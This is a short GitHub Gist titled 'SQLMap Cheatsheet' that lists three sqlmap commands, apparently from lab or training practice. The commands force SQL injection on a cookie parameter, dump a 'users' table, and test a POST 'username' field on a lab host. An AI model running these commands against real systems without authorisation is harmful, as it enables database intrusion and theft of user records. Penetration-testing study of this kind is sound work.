Last active
January 19, 2021 14:29
-
-
Save leveled/b008163e6fd8c184da85aa1af23093fc to your computer and use it in GitHub Desktop.
SQLMap Cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Forcing injection on a cookie | |
sqlmap -r blindsqli2.req -random-agent -force-ssl -p "TrackingId" --param-filter='COOKIE' --skip='session' --level=2 | |
#Dumping user table with 4 threads | |
sqlmap -r blindsqli2.req -random-agent -force-ssl --dump -T users --threads=4 | |
#Post Request | |
root@localhost:~/thinc-network/machines/10.11.1.252# sqlmap -r post -p username |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment